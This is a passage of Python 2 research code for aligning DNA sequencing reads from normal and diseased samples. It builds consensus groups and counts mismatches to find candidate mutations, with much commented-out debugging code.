# xrange((len(seqA)+1))]
scoreMatrix = [[0] * (1 + len(seqB)) for i in xrange(1 + len(seqA))]
for i in xrange(len(seqA)+1):
scoreMatrix[i][0] = i*indel
for j in xrange(len(seqB)+1):
scoreMatrix[0][j] = j*indel
for i in xrange(1, len(seqA)+1):
for j in xrange(1, len(seqB)+1):
if seqA[i-1] == seqB[j-1]:
score = scoreMatrix[i-1][j-1] + match
else:
score = scoreMatrix[i-1][j-1] + mismatch
opt1 = scoreMatrix[i-1][j] + indel
opt2 = scoreMatrix[i][j-1] + indel
maxi = opt1
if opt2 > maxi:
maxi = opt2
if score > maxi:
maxi = score
scoreMatrix[i][j] = maxi
# print seqA
# print seqB
# print scoreMatrix[len(seqA)][len(seqB)]
# for row in scoreMatrix:
# print row
# sys.exit(0)
# ************************************************************************** #
# #
# Sequence Alignment #
# #
# ************************************************************************** #
class AlignedGroup(object):
"""
"""
consensus = []
#preConsensus = []
readROffset = 0
consensusMain = 0 # read_R
# reads in group coming from left part - Normal sample
leftPartsN = dict()
# reads in group coming from left part - Diseased sample
leftPartsD = dict()
leftReadsOffset = 0
maxLeftReadsOffset = 0
# rightParts = dict() # reads in group coming from right part
# reads in group coming from right part and touching pre-consensus
# preRightParts = dict()
checkedRightParts = set()
rightPartGroups = [] # List of RightPart objects
mismatches = set()
# Initializer
def __init__(self, read_R, readROffset, leftReadsOffset):
self.consensus = []
#self.preConsensus = []
self.readROffset = readROffset
self.consensusMain = read_R
self.leftPartsN = dict()
self.leftPartsD = dict()
self.leftReadsOffset = leftReadsOffset
self.maxLeftReadsOffset = leftReadsOffset
#self.rightParts = dict()
#self.preRightParts = dict()
self.checkedRightParts = set()
self.rightPartGroups = []
self.mismatches = set()
class RightPartGroup(object):
"""
"""
consensus = []
preConsensus = []
rightPartsN = dict()
rightPartsD = dict()
mismatches = set()
# Initializer
def __init__(self, consensus):
self.consensus = copy.deepcopy(consensus)
self.preConsensus = []
self.rightPartsN = dict()
self.rightPartsD = dict()
self.mismatches = set()
def print_compare(read_R, misPos, mut, consens, log):
compareString = ""
for i in xrange(len(read_R)):
if i == misPos:
compareString += mut
else:
compareString += read_R[i]
logprint(log, False, "searchString:", compareString)
def print_fullConsensus(preconsensus, consensus, log=None):
alphabetSize = 4
for i in xrange(alphabetSize):
consensusString = ""
# pre-consensus
for j in xrange(len(preconsensus)):
consensusString += " "
# for j in xrange(len(preconsensus)):
# if i < len(preconsensus[j]) and \
# preconsensus[j][preconsensus[j].keys()[i]] >= \
# requiredOverlaps:
# consensusString += preconsensus[j].keys()[i]
# else:
# consensusString += " "
# Space between pre-consensus and consensus
# if consensusString != "":
# consensusString += " "
# Get main consensus
for j in xrange(len(consensus)):
if i < len(consensus[j]) and \
consensus[j][consensus[j].keys()[i]] >= requiredOverlaps:
consensusString += consensus[j].keys()[i]
else:
consensusString += " "
if consensusString.strip() != "":
print "", consensusString
if log:
log.write(" "+consensusString+"\n")
else:
continue
def print_alignedGroup(group, rightPartGroup, read_R, seqs, log):
logprint(log, False, "\nread_R:", read_R)
logprint(log, False, "Consensus:")
print_fullConsensus(rightPartGroup.preConsensus,
rightPartGroup.consensus, log)
lenPre = len(rightPartGroup.preConsensus)
newOffset = lenPre + group.readROffset
# Print normal reads
if read_R < secondSample:
logprint(log, False, " " * lenPre,
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsN:
for offset in group.leftPartsN[read_L]:
logprint(log, False, " " * (newOffset +
offset), seqs[read_L]+""+seqs[read_L+1])
for read_R2 in rightPartGroup.rightPartsN:
for offset in rightPartGroup.rightPartsN[read_R2]:
logprint(log, False, " " * (offset + lenPre),
seqs[read_R2-1]+""+seqs[read_R2])
# Print diseased reads
logprint(log, False, "")
if read_R >= secondSample:
logprint(log, False, " " * lenPre,
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsD:
for offset in group.leftPartsD[read_L]:
logprint(log, False, " " * (newOffset +
offset), seqs[read_L]+""+seqs[read_L+1])
for read_R2 in rightPartGroup.rightPartsD:
for offset in rightPartGroup.rightPartsD[read_R2]:
logprint(log, False, " " * (offset + lenPre),
seqs[read_R2-1]+""+seqs[read_R2])
leftParts = group.leftPartsN.keys() + \
group.leftPartsD.keys()
logprint(log, False, "Left parts:",
sorted(list(leftParts)))
logprint(log, False, "Number of left parts:",
len(leftParts))
rightParts = rightPartGroup.rightPartsN.keys() + \
rightPartGroup.rightPartsD.keys()
logprint(log, False, "Right parts:",
sorted(rightParts))
logprint(log, False, "Number of right parts:",
len(rightParts))
logprint(log, True, "mismatches:",
list(rightPartGroup.mismatches))
def print_leftGroup(group, read_R, seqs, log):
logprint(log, False, "\nread_R:", read_R)
logprint(log, False, "Consensus:")
print_fullConsensus([], group.consensus, log)
logprint(log, False, "", seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsN:
for offset in group.leftPartsN[read_L]:
logprint(log, False, " " * (offset + group.readROffset),
seqs[read_L]+""+seqs[read_L+1])
logprint(log, False, "")
for read_L in group.leftPartsD:
for offset in group.leftPartsD[read_L]:
logprint(log, False, " " * (offset + group.readROffset),
seqs[read_L]+""+seqs[read_L+1])
def print_alignedGroups(groups, read_R, seqs, log):
for group in groups:
if len(group.rightPartGroups) > 0:
for rightPartGroup in group.rightPartGroups:
if len(rightPartGroup.mismatches) > 0:
logprint(log, False, "\nread_R:", read_R)
logprint(log, False, "Consensus:")
# logprint(log, False, "", ''.join(consensus.keys()[0]
# for consensus in group.preConsensus) + #" " +
# ''.join(consensus.keys()[0] for consensus
# in group.consensus))
print_fullConsensus(rightPartGroup.preConsensus,
rightPartGroup.consensus, log)
lenPre = len(rightPartGroup.preConsensus)
newOffset = lenPre + group.readROffset
# Print normal reads
if read_R < secondSample:
logprint(log, False, " " * lenPre,
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsN:
for offset in group.leftPartsN[read_L]:
logprint(log, False, " " * (newOffset +
offset), seqs[read_L]+""+seqs[read_L+1])
for read_R2 in rightPartGroup.rightPartsN:
for offset in rightPartGroup.rightPartsN[read_R2]:
logprint(log, False, " " * (offset + lenPre),
seqs[read_R2-1]+""+seqs[read_R2])
# Print diseased reads
logprint(log, False, "")
if read_R >= secondSample:
logprint(log, False, " " * lenPre,
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsD:
for offset in group.leftPartsD[read_L]:
logprint(log, False, " " * (newOffset +
offset), seqs[read_L]+""+seqs[read_L+1])
for read_R2 in rightPartGroup.rightPartsD:
for offset in rightPartGroup.rightPartsD[read_R2]:
logprint(log, False, " " * (offset + lenPre),
seqs[read_R2-1]+""+seqs[read_R2])
leftParts = group.leftPartsN.keys() + \
group.leftPartsD.keys()
logprint(log, False, "Left parts:",
sorted(list(leftParts)))
logprint(log, False, "Number of left parts:",
len(leftParts))
rightParts = rightPartGroup.rightPartsN.keys() + \
rightPartGroup.rightPartsD.keys()
logprint(log, False, "Right parts:",
sorted(rightParts))
logprint(log, False, "Number of right parts:",
len(rightParts))
logprint(log, False, "mismatches:",
list(rightPartGroup.mismatches))
# logprint(log, False, "Number of mismatches:",
# len(rightPartGroup.mismatches))
# if len(group.mismatches) > 0:
# sys.exit()
# else:
elif len(group.mismatches) > 0:
logprint(log, False, "\nread_R:", read_R)
logprint(log, False, "Consensus:")
# logprint(log, False, "", ''.join(consensus.keys()[0]
# for consensus in group.consensus))
print_fullConsensus([], group.consensus, log)
if read_R < secondSample:
logprint(log, False, "",
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsN:
for offset in group.leftPartsN[read_L]:
logprint(log, False, " " *(offset +
group.readROffset),
seqs[read_L]+""+seqs[read_L+1])
if read_R >= secondSample:
logprint(log, False, "",
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsD:
for offset in group.leftPartsD[read_L]:
logprint(log, False, " " *(offset +
group.readROffset),
seqs[read_L]+""+seqs[read_L+1])
logprint(log, False, "mismatches:", group.mismatches)
leftParts = group.leftPartsN.keys() + group.leftPartsD.keys()
logprint(log, False, "Left parts:", sorted(leftParts))
logprint(log, True, "Number of left parts:", len(leftParts))
def sequenceAlignment(candidatePairs, normal, diseased, log):
seqsNormal = getAllReads(normal, log)
global secondSample
secondSample = len(seqsNormal)
seqsDiseased = getAllReads(diseased, log)
seqs = seqsNormal + seqsDiseased
numAlignedGroups = []
numRightPartGroups = []
numMutations1 = 0
numMutations2 = 0
numParts = len(candidatePairs) / 4 + 2
prog = 0
tim = time.clock()
for read_R in candidatePairs:
#for read_R in xrange(1, len(seqs)+1, 20):
#print read_R
if read_R < secondSample and read_R % 2 == 1:
# if read_R % 2 == 1:
# if read_R == 42535:
# if read_R == 19:
if len(candidatePairs[read_R]) > maxCandMates:
continue
alignedGroups = []
# Align left parts
alignLeftParts(read_R, seqs, alignedGroups, candidatePairs, log)
# Align right parts
alignRightParts(read_R, seqs, alignedGroups, candidatePairs, log)
# Analyze the aligned group to find mutations
if MUTFIND == 1:
numMutations1 += oldFindMutation(read_R, seqs,
alignedGroups,log)
else:
numMutations2 += newFindMutation(read_R, seqs,
alignedGroups,log)
# Statistics on number of created groups
numAlignedGroups.append(len(alignedGroups))
for group in alignedGroups:
numRightPartGroups.append(len(group.rightPartGroups))
#print_alignedGroups(alignedGroups, read_R, seqs, log)
# sys.exit()
prog += 1
if prog % 500 == 0:
logprint(log, False, "Processed", prog, "of", numParts,
"anchor points in", (time.clock()-tim)/60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
global c1
logprint(log, False, "left parts aligned:", c1)
#c1 = 0
global c2
logprint(log, True, "right parts aligned:", c2)
logprint(log, True, "num useful groups:", numMutations1)
logprint(log, True, "num useful groups:", numMutations2)
global c3
logprint(log, False, "positions compared:", c3)
#c2 = 0
logprint(log, False, "Finished sequence alignment",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
logprint(log, False, "c1:", c1)
logprint(log, False, "c2:", c2)
logprint(log, False, "c3:", c3)
logprint(log, False, "c4:", c4)
logprint(log, False, "c5:", c5)
logprint(log, False, "c6:", c6)
logprint(log, False, "c7:", c7)
logprint(log, False, "Too small groups:", c8)
logprint(log, False, "numReadL:", numreadL)
logprint(log, False, "numReadR:", numreadR)
logprint(log, False, "numMutations1:", numMutations1)
logprint(log, False, "numMutations2:", numMutations2)
logprint(log, False, "counterAlignGroups:\n", Counter(numAlignedGroups))
logprint(log, False, "counterRightGroups:\n", Counter(numRightPartGroups))
def multiSeqAlign(seqs, p, pool_size, num, candidatePairs, log):
#seqs, p, pool_size, num, log = tup
global p_id
p_id = p
log = None
numMutations1 = 0
numMutations2 = 0
numParts = ((num+1) / 2) / pool_size
prog = 0
tim = time.clock()
#r = redis.StrictRedis()
#r = shelve.open("shelveDBs/cache0", "r")
for read_R in xrange(p*2+1, secondSample+1, pool_size*2):
#print read_R
alignedGroups = []
# Align left parts
#alignLeftParts(read_R, seqs, alignedGroups, None, log, r)
alignLeftParts(read_R, seqs, alignedGroups, candidatePairs, log)
# Align right parts
#alignRightParts(read_R, seqs, alignedGroups, None, log, r)
alignRightParts(read_R, seqs, alignedGroups, candidatePairs, log)
# Analyze the aligned group to find mutations
if MUTFIND == 1:
numMutations1 += oldFindMutation(read_R, seqs,
alignedGroups, log)
else:
numMutations2 += newFindMutation(read_R, seqs,
alignedGroups, log)
#print_alignedGroups(alignedGroups, read_R, seqs, log)
# sys.exit()
prog += 1
if prog % 500 == 0:
logprint(log, False, "Processed", prog, "of", numParts,
"anchor points in", (time.clock()-tim)/60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
global c1
logprint(log, False, "left parts aligned:", c1)
#c1 = 0
global c2
logprint(log, True, "right parts aligned:", c2)
logprint(log, True, "num useful groups:", numMutations1)
logprint(log, True, "num useful groups:", numMutations2)
global c3
logprint(log, False, "positions compared:", c3)
#c2 = 0
logprint(log, False, "Finished sequence alignment",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
logprint(log, False, "c1:", c1)
logprint(log, False, "c2:", c2)
logprint(log, False, "c3:", c3)
logprint(log, False, "c4:", c4)
logprint(log, False, "c5:", c5)
logprint(log, False, "c6:", c6)
logprint(log, False, "c7:", c7)
logprint(log, False, "Too small groups:", c8)
logprint(log, False, "numReadL:", numreadL)
logprint(log, False, "numReadR:", numreadR)
logprint(log, False, "numMutations1:", numMutations1)
logprint(log, False, "numMutations2:", numMutations2)
#logprint(log, False, "counterAlignGroups:\n", Counter(numAlignedGroups))
#logprint(log, False, "counterRightGroups:\n", Counter(numRightPartGroups))
return p
def initMultiSeqAlign(normal, diseased, candPairs, pool, pool_size, log=None):
seqsNormal = getAllReads(normal, log)
global secondSample
secondSample = len(seqsNormal)
seqsDiseased = getAllReads(diseased, log)
seqs = seqsNormal + seqsDiseased
num = len(seqs)
#params = [(seqs, p, pool_size, num, log) for p in range(0, pool_size)]
#params = (seqs, pool_size, num, log)
#results = pool.map(multiSeqAlign, params)
for b in xrange(pool_size):
p=Process(target=multiSeqAlign, args=(seqs, b, pool_size, num,
candPairs, log, ))
p.start()
p.join()
#multiSeqAlign(params)
def alignLeftParts(read_R, seqs, alignedGroups, candidatePairs, log, r=None):
readROffset = len(seqs[read_R-1])
checkedLeftParts = set()
parts = candidatePairs[read_R]
for read_L in parts:
if read_L in checkedLeftParts:
continue
if read_L < secondSample:
m = M1 # set to 0 or M1
else:
m = M1
for alignInfo in findAlignment(read_R, read_L, seqs,
readROffset, m, log):
#offset += len(seqs[read_R-1])
offset, mis, lenCompared = alignInfo
global numreadL
numreadL += 1
#print offset
newGroup = True
for group in alignedGroups:
if fitsInGroup(group, seqs, read_R, read_L, alignInfo,
offset, M2):
# Add read_L to group
global c1
c1 += 1
if read_L < secondSample:
if read_L in group.leftPartsN:
group.leftPartsN[read_L].append(offset)
else:
group.leftPartsN[read_L] = [offset]
else:
if read_L in group.leftPartsD:
group.leftPartsD[read_L].append(offset)
else:
group.leftPartsD[read_L] = [offset]
# Fits in group, so don't create new group
newGroup = False
break
# If read_L doesn't fit in any group, then create a new
if newGroup:
global c7
c7 += 1
group = AlignedGroup(read_R, readROffset, offset+readROffset)
# Start of extra part - offsetExtraPart
start = len(seqs[read_R]) - offset
#group.consensusRight = seqs[read_L][start:] + seqs[read_L+1]
# Add read_L to new the group
if read_L < secondSample:
group.leftPartsN[read_L] = [offset]
else:
group.leftPartsD[read_L] = [offset]
group.leftReadsOffset = offset+group.readROffset
group.mismatches = mis
# Add anchor point to consensus
for bp in ''.join((seqs[read_R-1], seqs[read_R])):
group.consensus.append({bp:1})
# Add overlapping part of read_L to consensus
seq_read_L = ''.join((seqs[read_L], seqs[read_L+1]))
for index in xrange(start):
i = index + group.readROffset + offset
bp = seq_read_L[index]
group.consensus[i][bp] = group.consensus[i].get(bp, 0) + 1
# print " "*offset, (seqs[read_L]+seqs[read_L+1])
# print " "*-offset, seqs[read_R]
# print offset
# Add the rest of read_L to consensus
for bp in seq_read_L[start:]:
group.consensus.append({bp:1})
# Append new group to the other groups
alignedGroups.append(group)
checkedLeftParts.add(read_L)
# TESTING - Second pass of left-parts
# for i in xrange(len(alignedGroups)):
# for read_L in alignedGroups[i].leftPartsN:
# for j in xrange(i+1, len(alignedGroups)):
# for offset in alignedGroups[i].leftPartsN[read_L]:
# if fitsInGroup(alignedGroups[j], seqs, read_R, read_L,
# None, offset - group.readROffset, M2):
# if read_L in group.leftPartsN:
# group.leftPartsN[read_L].append(offset)
# else:
# group.leftPartsN[read_L] = [offset]
# for read_L in alignedGroups[i].leftPartsD:
# for j in xrange(i+1, len(alignedGroups)):
# for offset in alignedGroups[i].leftPartsD[read_L]:
# if fitsInGroup(alignedGroups[j], seqs, read_R, read_L,
# None, offset - group.readROffset, M2):
# if read_L in group.leftPartsD:
# group.leftPartsD[read_L].append(offset)
# else:
# group.leftPartsD[read_L] = [offset]
def findAlignment(r_R, r_L, seqs, readROffset, m, log):
read_R = seqs[r_R]
read_L = seqs[r_L]
doPrint = False
offset = 0
alignments = 0
if len(read_R) > len(read_L):
offset = len(read_R) - len(read_L)
lengthToCompare = len(read_L)# - overlap*2
else:
lengthToCompare = len(read_R)# - overlap*2
overlapLength = lengthToCompare - overlap*2
# check for alignment by shifting read_L along read_R
while lengthToCompare > overlapLength:
mismatches = set()
# if log == 2119:
# print "", read_R
# print " "*offset, read_L
for i in xrange(lengthToCompare):
if read_R[i+offset] != read_L[i]:
global c3
c3 += 1
mismatches.add(i+offset+readROffset)
if len(mismatches) > m:
break
if len(mismatches) <= m:
if doPrint:
print "offset:", offset
print "", read_R
print " "*(offset-1), read_L
print mismatches
yield offset, mismatches, lengthToCompare
alignments += 1
if maxAlignments == alignments:
break
offset += 1
lengthToCompare -= 1
def fitsInGroup(group, seqs, read_R, read_L, alignInfo, offset, m2):
global c6
c6 += 1
lread_R = seqs[read_R]
lread_L = seqs[read_L]+seqs[read_L+1]
mismatches = 0
if alignInfo:
offset2, mis, lenCompared = alignInfo
else:
lenCompared = len(lread_R) - offset
mis = set()
for i in xrange(lenCompared):
if lread_R[i+offset] != lread_L[i]:
mis.add(i+offset+group.readROffset)
offset += group.readROffset
mismatches = set()
seq_read_R = seqs[read_R-1]+seqs[read_R]
# lenToCompare = min(len(group.consensus)-offset, len(lread_L))
# for i in xrange(lenToCompare):
# if len(group.consensus[i+offset]) > 1 or \
# group.consensus[i+offset].keys()[0] != lread_L[i]:
# mismatches.add(i+offset)
lenToCompare = len(group.consensus)-len(seq_read_R)
readLLength = len(lread_L) - lenCompared
# if offset < 50:
# print
# print_fullConsensus([], group.consensus)
# print lenToCompare
# print readLLength
# print lenCompared
if readLLength < lenToCompare:
extraStart = lenToCompare - readLLength
lenToCompare = readLLength
# print extraStart
# print_fullConsensus([], group.consensus)
# print " "*offset, lread_L
for i in xrange(lenToCompare):
if len(group.consensus[i+len(seq_read_R)]) > 1 or \
group.consensus[i+len(seq_read_R)].keys()[0] != \
lread_L[i+lenCompared]:
mismatches.add(i+len(seq_read_R))
for m in group.mismatches:
mismatches.add(m)
for m in mis:
mismatches.add(m)
# if offset < 50:
# print " "*offset, (seqs[read_L]+seqs[read_L+1])
# print " "*-offset, seqs[read_R-1]+seqs[read_R]
# print offset
if len(mismatches) <= m2:
group.mismatches = mismatches
else:
return False
# Update consensus
lenToUpdate = min(len(group.consensus)-offset, len(lread_L))
for i in xrange(lenToUpdate):
group.consensus[i+offset][lread_L[i]] = \
group.consensus[i+offset].get(lread_L[i], 0) + 1
# Extend consensus to the right, if anything extra
extraPart = len(lread_L) - len(group.consensus) + offset
for i in xrange(extraPart):
group.consensus.append({lread_L[-(extraPart-i)]:1})
# if offset < 50:
# print " "*offset, (seqs[read_L]+seqs[read_L+1])
# print " "*-offset, seqs[read_R-1]+seqs[read_R]
# print offset
if group.leftReadsOffset > offset:
group.leftReadsOffset = offset
# print_fullConsensus([], group.consensus)
# print " "*offset, lread_L
# print offset
elif group.maxLeftReadsOffset < offset:
group.maxLeftReadsOffset = offset
# print newLeftReadsOffset
# print offset
# print
#group.mismatches = mismatches
return True
def alignRightParts_secondPass(group, seqs):
for pre_read_R in group.preRightParts:
for offset in group.preRightParts[pre_read_R]:
seq_pre_read_R = seqs[pre_read_R-1]+seqs[pre_read_R]
shallowGroup = getShallowGroup(group, pre_read_R,
seq_pre_read_R, offset, 0, 0, False)
if shallowGroup:
if pre_read_R in shallowGroup.preRightParts:
shallowGroup.preRightParts[pre_read_R].add(offset)
else:
shallowGroup.preRightParts[pre_read_R] = set([offset])
def createNewGroup(group, next_read_R, seq_next_read_R, offset, mismatches):
global c5
c5 += 1
newGroup = RightPartGroup(group.consensus)
if offset > 0:
j = offset
k = 0
else:
j = 0
k = -offset
# if next_read_R == 1805:
# print next_read_R
# print "LOL-NEW"
# print group.mismatches
# print newGroup.mismatches
# print mismatches
# print
# Update main-consensus
for i in xrange(len(seq_next_read_R)-k):
bp = seq_next_read_R[i+k]
newGroup.consensus[i+j][bp] = newGroup.consensus[i+j].get(bp, 0) + 1
# Update pre-consensus if any
for i in xrange(k):
bp = seq_next_read_R[i]
newGroup.preConsensus.append({bp:1})
global c2
c2 += 1
if next_read_R < secondSample:
#newGroup.rightPartsN[next_read_R] = set([offset])
newGroup.rightPartsN[next_read_R] = [offset]
else:
#newGroup.rightPartsD[next_read_R] = set([offset])
newGroup.rightPartsD[next_read_R] = [offset]
newGroup.mismatches = mismatches
if len(mismatches) > M2:
print mismatches
group.rightPartGroups.append(newGroup)
def addToGroup(group, rightPartGroup, seqs, read_R, next_read_R, offset, mismatches, m2):
global c4
c4 += 1
seq_next_read_R = seqs[next_read_R-1]+seqs[next_read_R]
seq_read_R = seqs[read_R-1]+seqs[read_R]
#all_mismatches = set([mis for mis in mismatches])
all_mismatches = copy.deepcopy(mismatches)
# Computes the length of the pre-consensus extension, if any
lenPreConsensus = len(rightPartGroup.preConsensus)
toExtend = -(lenPreConsensus + (group.readROffset -
len(seqs[next_read_R-1]) + offset))
if toExtend > 0:
"""
Case 1 - extending pre-consensus:
GAG TTATCATTGTGACTGGACAAAGTACG
GGAG TTATCATTGTGACTGGACAAA
"""
beginning = lenPreConsensus
j = 0
l = 0
elif offset > 0:
"""
Case 2 - no pre consensus access:
GAG TTATCATTGTGACTGGACAAAGTACG
TCATTGTGACTGGACAAA
"""
beginning = 0
j = offset
toExtend = 0
else: # offset <= 0
"""
Case 3 - touching pre-consensus:
GAG TTATCATTGTGACTGGACAAAGTACG
AG TTATCATTGTGACTGGACAAA
"""
# preconsensus already checked, start offset in read_k
beginning = -offset
# if read_k aligns in middle of consensus
j = 0
# Offset in preConsensus
l = lenPreConsensus+offset
# No extension
toExtend = 0
# Check consensus
# start = beginning + toExtend
# for i in xrange(group.leftReadsOffset-j):
# if seq_read_R[i+j] != seq_next_read_R[i+start]:
# all_mismatches.add(i+j)
# if len(all_mismatches) > m2:
# return True
# Check consensus
# start = beginning + toExtend
# for i in xrange(group.leftReadsOffset-j):
# if len(rightPartGroup.consensus[i+j]) > 1 or \
# rightPartGroup.consensus[i+j].iterkeys().next() \
# != seq_next_read_R[i+start]:
# all_mismatches.add(i+j)
# if len(all_mismatches) > m2:
# return False
# Check pre-consensus
for i in xrange(beginning):
if len(rightPartGroup.preConsensus[i+l]) > 1 or \
rightPartGroup.preConsensus[i+l].iterkeys().next() \
!= seq_next_read_R[i+toExtend]:
all_mismatches.add((i+l)-len(rightPartGroup.preConsensus))
global c3
c3 += 1
if len(all_mismatches) > m2:
# if next_read_R == 11035:
# print lenPreConsensus
# print "hej"
# print offset
# print toExtend
# print beginning
# print all_mismatches
# print_fullConsensus(rightPartGroup.preConsensus, rightPartGroup.consensus)
# print next_read_R
# createNewGroup(group, next_read_R, seq_next_read_R, offset,
# mismatches)
return False
# Add existing mismatches
# for mis in group.mismatches:
# all_mismatches.add(mis)
for mis in rightPartGroup.mismatches:
all_mismatches.add(mis)
if len(all_mismatches) > m2:
# createNewGroup(group, next_read_R, seq_next_read_R, offset,
# mismatches)
# global c3
# c3 += 1
# print read_R
# print next_read_R
# print " "*-offset,
# print_fullConsensus(rightPartGroup.preConsensus, rightPartGroup.consensus)
# print " "*offset, seq_next_read_R
# print offset
# print all_mismatches
# print rightPartGroup.mismatches
return False
# Update pre-consensus
for i in xrange(beginning):
bp = seq_next_read_R[i+toExtend]
rightPartGroup.preConsensus[i+l][bp] = \
rightPartGroup.preConsensus[i+l].get(bp, 0)+1
# Update main-consensus
start = beginning + toExtend
for i in xrange(len(seq_next_read_R)-start):
bp = seq_next_read_R[i+start]
rightPartGroup.consensus[i+j][bp] = \
rightPartGroup.consensus[i+j].get(bp, 0) + 1
# Extend pre-consensus if required
if toExtend > 0:
prePart = [{seq_next_read_R[i]:1} for i in xrange(toExtend)]
rightPartGroup.preConsensus = prePart + rightPartGroup.preConsensus
# Add read to group
global c2
c2 += 1
# if next_read_R == 3449:
# print next_read_R
# print "LOL"
# print group.mismatches
# print rightPartGroup.mismatches
# print
if next_read_R < secondSample:
if next_read_R in rightPartGroup.rightPartsN:
#rightPartGroup.rightPartsN[next_read_R].add(offset)
rightPartGroup.rightPartsN[next_read_R].append(offset)
else:
#rightPartGroup.rightPartsN[next_read_R] = set([offset])
rightPartGroup.rightPartsN[next_read_R] = [offset]
else:
if next_read_R in rightPartGroup.rightPartsD:
#rightPartGroup.rightPartsD[next_read_R].add(offset)
rightPartGroup.rightPartsD[next_read_R].append(offset)
else:
#rightPartGroup.rightPartsD[next_read_R] = set([offset])
rightPartGroup.rightPartsD[next_read_R] = [offset]
rightPartGroup.mismatches = all_mismatches
return True
def testRead(group, seqs, read_R, next_read_R, offset, m2, alignments, log):
seq_read_R = seqs[read_R-1]+seqs[read_R]
seq_next_read_R = seqs[next_read_R-1]+seqs[next_read_R]
# Check overlapping part
leftROffset = group.leftReadsOffset
lenToCompare = len(seq_next_read_R) - (leftROffset - offset)
mismatches = set([mis for mis in group.mismatches])
m1 = 0
m = M1 # set to 0 or M1
for i in xrange(lenToCompare):
# if next_read_R == 1805:
# print "hejhej"
# print group.consensus[group.leftReadsOffset+i].keys()[0], seq_next_read_R[i+group.leftReadsOffset-offset]
# print group.leftReadsOffset+i
# print group.leftReadsOffset
# print lenToCompare
# print group.leftReadsOffset+i
# print group.leftReadsOffset-offset+i
# print group.consensus[i+group.leftReadsOffset].iterkeys().next()
# print seq_next_read_R[i+group.leftReadsOffset-offset]
if next_read_R < secondSample and (leftROffset+i) < len(seq_read_R):
if seq_read_R[i+leftROffset] != \
seq_next_read_R[i+leftROffset-offset]:
mismatches.add(leftROffset+i)
m1 += 1
if m1 > m:
return alignments
if len(group.consensus[leftROffset+i]) > 1 or \
group.consensus[leftROffset+i].iterkeys().next() \
!= seq_next_read_R[i+leftROffset-offset]:
mismatches.add(leftROffset+i)
global c3
c3 += 1
m1 += 1
# if next_read_R == 1805:
# #print " "*-offset,
# print_fullConsensus([], group.consensus)
# print " "*offset, seq_next_read_R
# print offset
# print "lololol"
# print group.consensus[group.leftReadsOffset+i].keys()[0], seq_next_read_R[i+group.leftReadsOffset-offset]
if leftROffset+i < len(seq_read_R):
if m1 > M1:
return alignments
else:
if m1 > M2:
return alignments
if len(mismatches) > m2:
return alignments
# print c3
# sys.exit()
# if next_read_R == 2097:
# print " "*-offset, seq_read_R
# print " "*offset, seq_next_read_R
# print read_R
# print next_read_R
# print mismatches
# print
# # print "Passed"
# print_fullConsensus([], group.consensus)
# print group.maxLeftReadsOffset
# print group.leftReadsOffset
# print offset
# Check rest against anchor
if offset > 0:
j = offset
k = 0
else:
j = 0
k = -offset
for i in xrange(leftROffset-j):
# if next_read_R == 2097:
# print seq_read_R[i+j], seq_next_read_R[i+k]
if seq_read_R[i+j] != seq_next_read_R[i+k]:
global c3
c3 += 1
mismatches.add(i+j)
if len(mismatches) > m2:
return alignments
added = False
# Check if it fits into existing groups
for rightPartGroup in group.rightPartGroups:
if addToGroup(group, rightPartGroup, seqs, read_R, next_read_R,
offset, mismatches, m2):
added = True
break
if not added:
createNewGroup(group, next_read_R, seq_next_read_R, offset,
mismatches)
return alignments + 1
def alignRightParts(read_R, seqs, alignedGroups, candidatePairs, log):
startOnePosOverlap = True
for group in alignedGroups:
group.checkedRightParts.add(read_R)
# TODO: Should probably be removed as valid groups might be removed
if len(group.leftPartsN)+len(group.leftPartsD) < 3:
global c8
c8 += 1
continue
for read_L in (group.leftPartsN.keys()+group.leftPartsD.keys()):
if len(candidatePairs[read_L]) > maxCandMates:
continue
parts = candidatePairs[read_L]
for next_read_R in parts:
if next_read_R not in group.checkedRightParts:
if startOnePosOverlap:
# m = M2
# if next_read_R < secondSample:
# if M2 > 0 and len(group.mismatches) < M2:
# m = M2-1
alignments = 0
seq_next_read_R = seqs[next_read_R-1] + \
seqs[next_read_R]
#st = group.maxLeftReadsOffset
# for offset in xrange(group.readROffset,
# st-len(seq_next_read_R), -1):
for offset in xrange(overlap, -overlap-1, -1):
# offset = 0
# for change in xrange(overlap*2+1):
# if change % 2 == 0:
# offset -= change
# else:
# offset += change
# print "st:", st
# print "r_offset:", group.readROffset
# print_leftGroup(group, read_R, seqs, log)
# print next_read_R
# print seq_next_read_R
# print offset
# print st-len(seq_next_read_R)
global numreadR
numreadR += 1
alignments = testRead(group, seqs, read_R,
next_read_R, offset, M2,
alignments, log)
group.checkedRightParts.add(next_read_R)
if alignments == maxAlignments:
break
else:
for alignInfo in findAlignment(next_read_R, read_L,
seqs, group.readROffset, 0, log):
for offset2 in (group.leftPartsN[read_L] +
group.leftPartsD[read_L]):
# global numreadR
# numreadR += 1
offset1, mis, lenCompared = alignInfo
offset = offset2 - offset1
offset += group.readROffset - \
len(seqs[next_read_R-1])
# mis = dismissRead(group, seqs, next_read_R,offset)
#
# if len(mis) > M2:
# group.checkedRightParts.add(next_read_R)
# continue
#
# added = False
# for rightPartGroup in group.rightPartGroups:
# added = fitsInGroup4(group, rightPartGroup,
# seqs, read_R, next_read_R, offset,
# mis, M2)
#
# # if not added:
# if len(group.rightPartGroups) == 0:
# seq_next_read_R = seqs[next_read_R-1]+seqs[next_read_R]
# createNewGroup(group, next_read_R,
# seq_next_read_R, offset, mis)
testRead(group, seqs, read_R, next_read_R,
offset, M2, alignments, log)
group.checkedRightParts.add(next_read_R)
# Second pass to add possible missing pre-right-parts to other groups
# alignRightParts_secondPass(group, seqs)
# for shallowGroup in group.shallowGroups:
# alignRightParts_secondPass(shallowGroup, seqs)
# GTCAA AGTTCAG
# TCAGAA TGCCC
# TTCAGAA TGCC
# 7 6 3 = 4
